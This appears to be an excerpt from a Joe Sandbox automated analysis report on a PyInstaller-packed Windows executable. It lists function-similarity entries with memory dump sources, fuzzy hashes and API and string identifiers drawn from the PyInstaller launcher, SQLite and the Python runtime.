                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction ID: a39ba22ef69299ae5797ac6fb7022814a1b6883c9326e92b67ad90b9cd67a3ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF08C10F1824380FE653B715C5B2B412904FD4BB0F480730EC2EC62C2EE2EA4A28612
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                              • Instruction ID: d7252acce92481b4eccf3537b187236782f2d67d36c8bbdcf4d5647aad6e1b89
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6D18172A08A8286EF108F38EC592AD3760FF95B68F504235DE5E83AA4DF7CD154C746
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcmpmemcpy
                                                                                                                                                                                                                                              • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                                              • API String ID: 1784268899-1067337024
                                                                                                                                                                                                                                              • Opcode ID: 14ba734cd6d25d3ab9e29de301cc1b2d38027898f96f5f7fc5655e0f27bc498b
                                                                                                                                                                                                                                              • Instruction ID: bde09798c3cc0be29f551beb871458eb1baf9594450376ab396bfc7802353c62
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14ba734cd6d25d3ab9e29de301cc1b2d38027898f96f5f7fc5655e0f27bc498b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C02F66AF0C78285FB6D8B159230B7D6AD1AB52B56F0442B5CA7E873D9DE3DE481C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Mem_$FreeSubtypeType_$DataErr_FromKindMallocMemoryReallocUnicode_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3719493655-0
                                                                                                                                                                                                                                              • Opcode ID: 0b61fa8abd9dfcdf7751d429d18c280f61a1d7a5a4373fae919a70ebd3257318
                                                                                                                                                                                                                                              • Instruction ID: 5f947efb0c69f75659c0e86a687737ab3d8f2b01e20fd76f2e1244905b275477
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b61fa8abd9dfcdf7751d429d18c280f61a1d7a5a4373fae919a70ebd3257318
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A022472B1CA828AE72E9B14D434E7937A0FF85780F5541B1D66E867CCEE2DE44AC314
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 313767242-0
                                                                                                                                                                                                                                              • Opcode ID: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                              • Instruction ID: 7bbd088c070252a8e9ca49839f4b09f3a9a634b13c3b26c1ddc56ed5053cdc37
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D317A76719B828EEBA48F60E8607EA33A4FB84304F40403ADA5E47B98DF38D54DC714
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                              • API String ID: 2221118986-463513059
                                                                                                                                                                                                                                              • Opcode ID: d68a127d841d65a3257d40cf2df7cbf0d8bc42d3f4fd7b6e20ccfa66f4e4daa9
                                                                                                                                                                                                                                              • Instruction ID: 054bcbeb7210ec0de61a3e448d73e74e82641ce7019c5ffef25b404c4c1897de
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d68a127d841d65a3257d40cf2df7cbf0d8bc42d3f4fd7b6e20ccfa66f4e4daa9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2E11111B1C3C607EF0D8B3939319786AA1AB45781F9481BADABE477D6DE3CB512C310
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                                                                                                              • API String ID: 2221118986-741541785
                                                                                                                                                                                                                                              • Opcode ID: dc9b3f8e47221699f1f973630f934032112ca486049a4d8f98b22e4038558d74
                                                                                                                                                                                                                                              • Instruction ID: fe6ceb50efd4cf7c0a390ddf537ca521e586a1cbc745bed9c6ffcd4fa7e43973
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc9b3f8e47221699f1f973630f934032112ca486049a4d8f98b22e4038558d74
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57027232B087818AE728CB66E4A0A7D77A1FB88748F544175DA6E47BD9DF7CE441CB00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F842B
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84AE
                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84CD
                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84DB
                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84EC
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84F5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction ID: 5a4c9c5329e50b266b8a1199ffe3e1a54a90469d85353712d09d069954f98b4d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0416021A0C94289EE209B24EC591FA6360FF96774F500332ED9DC2694EF7DE585C74A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4139299733-0
                                                                                                                                                                                                                                              • Opcode ID: bb7a1583b311f9023fc161d2ea2417430d383a05e2e7d543d3dd2600494f88aa
                                                                                                                                                                                                                                              • Instruction ID: 71a386c7d6ade97a742f6e5b48d59cb15428a6f739293b4712c22ef48849833e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb7a1583b311f9023fc161d2ea2417430d383a05e2e7d543d3dd2600494f88aa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBE1CAB2F1CA5289EB2E9B15D074E7D72A1EF90744F5401B5DA6F426CCDE2CE84AC308
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction ID: beaedb28620dca0820e320a6e2c27a3ce8439a0329a40f4e22887220335bbebd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85313D72608B818AEB609F64EC843EE7364FB94758F44403ADA4E87B98DF7CD548C715
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                                              • API String ID: 0-2031831958
                                                                                                                                                                                                                                              • Opcode ID: 6e0f98e82388a9241255ea5314a25ad84ded85dd30c3e533139e972041858ceb
                                                                                                                                                                                                                                              • Instruction ID: 442e73e15fab017e074d3f21ae49cea783298f05604b4d99e9ea538357d848c0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e0f98e82388a9241255ea5314a25ad84ded85dd30c3e533139e972041858ceb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3D13762B1D69285DB28CB28E0A4F7D7BA1FB44784F8640B5DE6E477C9DE6CE480C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                              • Instruction ID: c7ca2951b58de854e9435c53d4e88286f2e3c369a0eeba24442f6d66f35b0a8a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0316E36608B8186DB60CF29EC452AE73A4FB987A8F540135EE9D83B94DF7CD159CB01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                                              • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                              • Instruction ID: b953d486e0e311c067662f3579c5b56241669748530832a6119eb82da4e9b82d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1B11A22B18A9641EF60DB29AC0A2B9A3A1EF54BF4F544131DD5D87BD5EF7CE441C302
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                                                                                                                              • Opcode ID: 93c7ce6ee5c79305409f8c2a58caa6f335f99a868b695c17bafe5d61925176e2
                                                                                                                                                                                                                                              • Instruction ID: b17c0a5b1d5a1c78030e1cd676370826fb655a19f694ec81010677cd4c19f0c3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93c7ce6ee5c79305409f8c2a58caa6f335f99a868b695c17bafe5d61925176e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DE1DF327087818AE7988F69D060BAD77A5FB59B88F448076EE5E477CADF3DE4458300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5840
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5852
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5889
